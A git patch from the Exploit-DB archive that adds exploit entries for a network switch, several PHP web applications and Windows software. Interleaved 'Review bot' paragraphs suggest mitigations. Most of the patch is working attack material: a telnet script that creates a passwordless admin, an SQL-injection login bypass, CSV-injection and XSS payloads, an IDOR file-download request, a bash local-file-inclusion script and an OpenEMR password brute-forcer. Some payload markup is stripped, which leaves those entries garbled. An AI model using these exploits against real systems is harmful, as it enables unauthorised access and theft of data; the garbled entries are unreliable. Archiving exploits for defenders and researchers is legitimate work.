From 668314bbda0333ab110c855ce43adf827bda0e9c Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Wed, 3 May 2023 00:16:23 +0000 Subject: [PATCH] DB: 2023-05-03 19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control --- exploits/hardware/local/51414.py | 48 +++++++++++++ exploits/multiple/webapps/51142.txt | 1 + exploits/php/webapps/51398.txt | 48 +++++++++++++ exploits/php/webapps/51399.txt | 20 ++++++ exploits/php/webapps/51400.txt | 40 +++++++++++ exploits/php/webapps/51401.txt | 49 ++++++++++++++ exploits/php/webapps/51402.txt | 21 ++++++ exploits/php/webapps/51403.txt | 67 +++++++++++++++++++ exploits/php/webapps/51404.sh | 60 +++++++++++++++++ exploits/php/webapps/51411.txt | 100 ++++++++++++++++++++++++++++ exploits/php/webapps/51413.py | 90 +++++++++++++++++++++++++ exploits/php/webapps/51415.txt | 46 +++++++++++++ exploits/php/webapps/51416.txt | 40 +++++++++++ exploits/php/webapps/51417.txt | 20 ++++++ exploits/php/webapps/51418.py | 59 ++++++++++++++++ exploits/windows/local/51410.txt | 37 ++++++++++ exploits/windows/local/51412.txt | 59 ++++++++++++++++ files_exploits.csv | 18 ++++- ghdb.xml | 60 +++++++++++++++++ 19 files changed, 882 insertions(+), 1 deletion(-) create mode 100755 
exploits/hardware/local/51414.py create mode 100644 exploits/php/webapps/51398.txt create mode 100644 exploits/php/webapps/51399.txt create mode 100644 exploits/php/webapps/51400.txt create mode 100644 exploits/php/webapps/51401.txt create mode 100644 exploits/php/webapps/51402.txt create mode 100644 exploits/php/webapps/51403.txt create mode 100755 exploits/php/webapps/51404.sh create mode 100644 exploits/php/webapps/51411.txt create mode 100755 exploits/php/webapps/51413.py create mode 100644 exploits/php/webapps/51415.txt create mode 100644 exploits/php/webapps/51416.txt create mode 100644 exploits/php/webapps/51417.txt create mode 100755 exploits/php/webapps/51418.py create mode 100644 exploits/windows/local/51410.txt create mode 100644 exploits/windows/local/51412.txt diff --git a/exploits/hardware/local/51414.py b/exploits/hardware/local/51414.py new file mode 100755 index 000000000..e07e51ccb --- /dev/null +++ b/exploits/hardware/local/51414.py 
@@ -0,0 +1,48 @@ +# Exploit Title: FS-S3900-24T4S Privilege Escalation +# Date: 29/04/2023 +# Exploit Author: Daniele Linguaglossa & Alberto Bruscino +# Vendor Homepage: https://www.fs.com/ +# Software Link: not available +# Version: latest +# Tested on: latest +# CVE : CVE-2023-30350 + +import sys +import telnetlib + + +def exploit(args): + print(args) + if len(args) != 1: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + else: + ip = args[0] + try: + with telnetlib.Telnet(ip, 23) as tn: + try: + tn.read_until(b"Username: ") + tn.write(b"guest\r\n") + tn.read_until(b"Password: ") + tn.write(b"guest\r\n") + tn.read_until(b">") + tn.write(b"enable\r\n") + tn.read_until(b"Password: ") + tn.write(b"super\r\n") + tn.read_until(b"#") + tn.write(b"configure terminal\r\n") + tn.read_until(b"(config)#") + tn.write(b"username admin nopassword\r\n") + tn.read_until(b"(config)#") + print( + "Exploit success, you can now login with username: admin and password: ") + tn.close() + except KeyboardInterrupt: + print("Exploit failed") + tn.close() + except ConnectionRefusedError: + print("Connection refused") + + +if __name__ == "__main__": + exploit(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/multiple/webapps/51142.txt b/exploits/multiple/webapps/51142.txt index 15dd2764a..fc4eed6b3 100644 --- a/exploits/multiple/webapps/51142.txt +++ b/exploits/multiple/webapps/51142.txt @@ -3,6 +3,7 @@ # Vendor Homepage: https://www.virtualreception.nl/ # Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY # Tested on: all +# CVE-ID: CVE-2023-25289 We discovered the web server of the Virtual Reception appliance is prone to an unauthenticated directory traversal vulnerability. This allows an diff --git a/exploits/php/webapps/51398.txt b/exploits/php/webapps/51398.txt new file mode 100644 index 000000000..23074a717 --- /dev/null +++ b/exploits/php/webapps/51398.txt 
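Review bot: The header of exploits/hardware/local/51414.py gives `# Version: latest` and `# Tested on: latest`, so a defender cannot tell which firmware builds are exposed to CVE-2023-30350, and nothing warns that the script changes the switch configuration. I would record the firmware build that was tested and add a comment such as `# NOTE: appears to leave a passwordless "admin" user in the running config; remove it after testing`. A remediation line is also missing, for example `# Mitigation: disable telnet, remove or re-credential the guest account, change the enable password`. Separately, `telnetlib` was deprecated by PEP 594 and removed in Python 3.13, so the header should state the interpreter version the file needs.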
@@ -0,0 +1,48 @@ +# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) +# Google Dork: None +# Date: 4/26/2023 +# Exploit Author: Or4nG.M4n +# Vendor Homepage: https://github.com/jcwebhole +# Software Link: https://github.com/jcwebhole/php_restaurants +# Version: 1.0 + + +functions.php + +function login(){ +global $conn; +$email = $_POST['email']; +$pw = $_POST['password']; + +$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = +'".md5($pw)."'"; <-- there is No filter to secure sql query +parm[email][password] +$result = $conn->query($sql); +if ($result->num_rows > 0) { +while($row = $result->fetch_assoc()) { +setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day +header('location: index.php'); +} +} else { +header('location: login.php?m=Wrong Password'); +} + +} + +login bypass at admin page /rest1/admin/login.php + +email & password : ' OR 1=1 -- <- add [space] end of the payload + +cross site scripting main page /index.php + +xhttp.open("GET", "functions.php?f=getRestaurants + ", true); +xhttp.send(); + + <-- when you insert your'e payload don't forget to add +like + +xss payload : \ No newline at end of file diff --git a/exploits/php/webapps/51399.txt b/exploits/php/webapps/51399.txt new file mode 100644 index 000000000..482c345e1 --- /dev/null +++ b/exploits/php/webapps/51399.txt 
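Review bot: The write-up in 51398.txt marks the concatenated query in `login()` as unfiltered but never states the fix, and it passes over two further weaknesses in the same listing: the password is compared as unsalted `md5($pw)`, and login state is a bare `uid` cookie holding the row id. I would add a remediation paragraph saying the query should be a prepared statement (`$conn->prepare("SELECT * FROM users WHERE email = ?")` with `bind_param`), the password should be checked with `password_verify()` against a `password_hash()` value, and the login state should live in a server-side session rather than a client-supplied id. The XSS section appears to have lost its markup in this copy, so the sink it refers to cannot be reviewed from the hunk.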
@@ -0,0 +1,20 @@ +Exploit Title: phpMyFAQ v3.1.12 - CSV Injection +Application: phpMyFAQ +Version: 3.1.12 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.phpmyfaq.de/ +Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip +Date of found: 21.04.2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to user control panel and change name as =calc|a!z| and save +step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator + +payload: calc|a!z| +Poc video: https://youtu.be/lXwaexX-1uU \ No newline at end of file diff --git a/exploits/php/webapps/51400.txt b/exploits/php/webapps/51400.txt new file mode 100644 index 000000000..c53fa7eac --- /dev/null +++ b/exploits/php/webapps/51400.txt 
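Review bot: Neither 51399.txt (phpMyFAQ) nor 51402.txt (admidio, later in this patch) tells an operator how to defend the export, which is the part a maintainer needs. I would add to both a line such as `Mitigation: on CSV/Excel export, prefix any cell that begins with =, +, - or @ with a single quote so the spreadsheet treats it as text`. In 51399.txt the `payload:` line also disagrees with step 2 about the leading `=`; the two should match. It is worth stating the precondition too: the effect depends on the admin opening the export in a spreadsheet application, which is inferred from step 3 rather than shown.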
@@ -0,0 +1,40 @@ +Exploit Title: projectSend r1605 - Private file download +Application: projectSend +Version: r1605 +Bugs: IDOR +Technology: PHP +Vendor URL: https://www.projectsend.org/ +Software Link: https://www.projectsend.org/ +Date of found: 24-01-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + + +Technical Details & POC +======================================== + +1.Access to private files of any user, including admin + + +just change id + + + +GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1 +Host: localhost +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/manage-files.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/51401.txt b/exploits/php/webapps/51401.txt new file mode 100644 index 000000000..9b4fa2224 --- /dev/null +++ b/exploits/php/webapps/51401.txt 
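Review bot: 51400.txt does not say which role the requesting session holds, so it is unclear whether any logged-in client or only certain roles can fetch other users' files through `process.php?do=download&id=`. State the role used for the test and add the fix, e.g. `Mitigation: before serving a download, verify that the file id belongs to the session user or is explicitly assigned to them`. The captured request also carries a `PHPSESSID` value that is best redacted before publication.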
@@ -0,0 +1,49 @@ +Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) +Application: revive-adserver +Version: 5.4.1 +Bugs: XSS +Technology: PHP +Vendor URL: https://www.revive-adserver.com/ +Software Link: https://www.revive-adserver.com/download/ +Date of found: 31-03-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. Go to create banner +2. select the advanced section +3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) + +POST /www/admin/banner-advanced.php HTTP/1.1 +Host: localhost +Content-Length: 213 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 +Connection: close + +clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet + + + +We are sending this link to the admin. then if admin clicks it will be exposed to xss + +http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 \ No newline at end of file 
diff --git a/exploits/php/webapps/51402.txt b/exploits/php/webapps/51402.txt new file mode 100644 index 000000000..15abe3131 --- /dev/null +++ b/exploits/php/webapps/51402.txt @@ -0,0 +1,21 @@ +Exploit Title: admidio v4.2.5 - CSV Injection +Application: admidio +Version: 4.2.5 +Bugs: CSV Injection +Technology: PHP +Vendor URL: https://www.admidio.org/ +Software Link: https://www.admidio.org/download.php +Date of found: 26.04.2023 +Author: Mirabbas Ağalarov +Tested on: Windows + + +2. Technical Details & POC +======================================== +Step 1. login as user +step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) +step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2) + +payload: =calc|a!z| + +Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ \ No newline at end of file diff --git a/exploits/php/webapps/51403.txt b/exploits/php/webapps/51403.txt new file mode 100644 index 000000000..a8fece970 --- /dev/null +++ b/exploits/php/webapps/51403.txt 
@@ -0,0 +1,67 @@ +## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE +## Author: nu11secur1ty +## Date: 04.26.2023 +## Vendor: https://docs.s9y.org/index.html +## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 +## Reference: https://portswigger.net/web-security/file-upload +## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload + +## Description: +The already authenticated attacker can upload HTML files on the +server, which is absolutely dangerous and STUPID +In this file, the attacker can be codding a malicious web-socket +responder that can connect with some nasty webserver somewhere. It +depends on the scenario, the attacker can steal every day very +sensitive information, for a very long period of time, until the other +users will know that something is not ok with this system, and they +decide to stop using her, but maybe they will be too late for this +decision. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```HTML + + + + + NodeJS WebSocket Server + + +

You have just sent a message to your attacker,
+

that you are already connected to him.

+ + + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0) + +## Proof and Exploit: +[href](https://streamable.com/2s80z6) + +## Time spend: +01:27:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51404.sh b/exploits/php/webapps/51404.sh new file mode 100755 index 000000000..af5ec9162 --- /dev/null +++ b/exploits/php/webapps/51404.sh 
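Review bot: The title of 51403.txt says "File Inclusion RCE", but the description and the PoC only show an authenticated user uploading an HTML file whose script runs in a visitor's browser; nothing in the hunk demonstrates server-side inclusion or code execution. I would retitle it to match what is shown (script-bearing HTML upload by an authenticated user) so that triage assigns the right class and severity. A remediation line is missing as well; something like `Mitigation: restrict upload types by allow-list and serve user uploads with Content-Disposition: attachment and X-Content-Type-Options: nosniff` would cover the behaviour described.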
@@ -0,0 +1,60 @@ +# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion +# Date: 27-04-2023 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.softexpert.com/ +# Version: 2.0 < 2.1.3 +# Tested on: Kali Linux +# CVE : CVE-2023-30330 +# SE Suite versions tested: 2.0.15.31, 2.0.15.115 + +# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330 + + +#!/bin/bash + +# Usage: ./lfi-poc.sh + +target=$1 +u=$2 +p=$3 +file=$(echo -n "$4"|base64 -w 0) + +end="\033[0m\e[0m" +red="\e[0;31m\033[1m" +blue="\e[0;34m\033[1m" + +echo -e "\n$4 : $file\n" + +echo -e "${blue}\nGETTING SESSION COOKIE${end}" +cookie=$(curl -i -s -k -X $'POST' \ + -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ + -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ + --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ + "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2) + +echo "cookie: $cookie" + +function LFI () { + +curl -s -k -X $'POST' \ + -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ + -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ + --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ + "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php" + +} + +echo -e "${blue}\nExploiting LFI:${end}" +LFI + +function logout () { +curl -i -s -k -X $'POST' \ + -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ + -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ + 
"https://$target/softexpert/selogout" +} + +echo -e "${blue}\nLogging out${end}" +logout >/dev/null +echo -e "\n\nDone!" \ No newline at end of file diff --git a/exploits/php/webapps/51411.txt b/exploits/php/webapps/51411.txt new file mode 100644 index 000000000..5e2bb00c8 --- /dev/null +++ b/exploits/php/webapps/51411.txt 
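Review bot: `#!/bin/bash` sits below the comment header in 51404.sh, so it is not on line 1 and is treated as an ordinary comment, even though the script relies on bash-only `$'...'` quoting and the `function` keyword; move it to the first line. The password arrives as `$3` and is then placed on curl's command line, where it is visible in the process list and shell history on the tester's machine; prompting for it with `read -rs p` avoids that. For defenders, the header could carry a detection hint taken from the request itself: `# Detection: POST to .../generic/gn_defaultframe/2.0/defaultframe_filter.php with action=4 and a base64-encoded managerPath`.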
@@ -0,0 +1,100 @@ +Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) +Application: PHPFusion +Version: 9.10.30 +Bugs: XSS +Technology: PHP +Vendor URL: https://www.php-fusion.co.uk/home.php +Software Link: https://sourceforge.net/projects/php-fusion/ +Date of found: 28-04-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw) +2. upload malicious svg file + +svg file content ===> + + + + + + + + + + +poc request: + + +POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1 +Host: localhost +Content-Length: 1198 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-platform: "Linux" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0 +Connection: close + +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="reqid" + +187c77be8e52cf +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="cmd" + 
+upload +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="target" + +l1_Lw +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]" + +SVG_XSS.svg +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" +Content-Type: image/svg+xml + + + + + + + + +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="mtime[]" + +1681116842 +------WebKitFormBoundaryxF2jB690PpLWInAA +Content-Disposition: form-data; name="overwrite" + +0 +------WebKitFormBoundaryxF2jB690PpLWInAA-- + + +3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file( +http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg) + + + +poc video : https://youtu.be/6yBLnRH8pOY \ No newline at end of file diff --git a/exploits/php/webapps/51413.py b/exploits/php/webapps/51413.py new file mode 100755 index 000000000..df7e1bf07 --- /dev/null +++ b/exploits/php/webapps/51413.py 
@@ -0,0 +1,90 @@ +# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force +# Date: 2023-04-28 +# Exploit Author: abhhi (Abhishek Birdawade) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz +# Version: 7.0.1 +# Tested on: Windows + +''' +Example Usage: +- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt +''' + +import requests +import sys +import argparse, textwrap +from pwn import * + +#Expected Arguments +parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, +epilog=textwrap.dedent(''' +Exploit Usage : +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt +python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt''')) + +parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") +parser.add_argument("-u","--username", help="Username to Bruteforce for.") +parser.add_argument("-ul","--userlist", help="Username Dictionary") +parser.add_argument("-p","--passlist", help="Password Dictionary") +args = parser.parse_args() + +if len(sys.argv) < 2: + print (f"Exploit Usage: python3 exploitBF.py -h") + sys.exit(1) + +# Variable +LoginPage = args.url +Username = args.username +Username_list = args.userlist +Password_list = args.passlist + +log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ') + +def login(Username,Password): + session = requests.session() + r = session.get(LoginPage) + +# Progress Check + process = 
log.progress('Brute Force') + +#Specifying Headers Value + headerscontent = { + 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + 'Referer' : f"{LoginPage}", + 'Origin' : f"{LoginPage}", + } + +#POST REQ data + postreqcontent = { + 'new_login_session_management' : 1, + 'languageChoice' : 1, + 'authUser' : f"{Username}", + 'clearPass' : f"{Password}" + } + +#Sending POST REQ + r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False) + +#Printing Username:Password + process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) + +#Conditional loops + if 'Location' in r.headers: + if "/interface/main/tabs/main.php" in r.headers['Location']: + print() + log.info(f'SUCCESS !!') + log.success(f"Use Credential -> {Username}:{Password}") + sys.exit(0) + +#Reading User.txt & Pass.txt files +if Username_list: + userfile = open(Username_list).readlines() + for Username in userfile: + Username = Username.strip() + +passfile = open(Password_list).readlines() +for Password in passfile: + Password = Password.strip() + login(Username,Password) \ No newline at end of file diff --git a/exploits/php/webapps/51415.txt b/exploits/php/webapps/51415.txt new file mode 100644 index 000000000..3f0580692 --- /dev/null +++ b/exploits/php/webapps/51415.txt 
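Review bot: The header of 51413.py names a "Brute Force Mitigation Bypass" without saying which mitigation is bypassed or what the fix is, so a defender cannot act on it. From the visible code, `login()` builds a new `requests.session()` for every attempt, which suggests the failed-attempt counter is tied to the session; that should be stated as the root cause, hedged until confirmed against OpenEMR 7.0.1. I would add header comments along the lines of `# Mitigation: count failed logins per account and per source address server-side, not per session` and `# Detection: repeated POSTs to main_screen.php?auth=login, each with a fresh session cookie`. On style, `from pwn import *` pulls a whole third-party namespace in for the one `log` name the script uses; an explicit import would make the dependency clear.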
@@ -0,0 +1,46 @@ +# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) +# Date: 2023-04-29 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.phpjabbers.com/faq.php +# Software Link: https://www.phpjabbers.com/simple-cms/ +# Version: 5.0 +# Tested on: Kali Linux + +### Steps to Reproduce ### + +- Please login from this address: +https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin +- Click on the "Add Section" button. +- Then enter the payload (">) in the +"Section" box and save it. +- Boom! An alert message saying "Stored" will appear in front of you. + +### PoC Request ### + +POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate +HTTP/1.1 +Host: localhost +Cookie: pj_sid=PJ1.0.6199026527.1682777172; +pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; +PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; +pjd=7l9bb4ubmknrdbns46j7g5cqn7 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 371 +Origin: https://localhost +Referer: +https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + 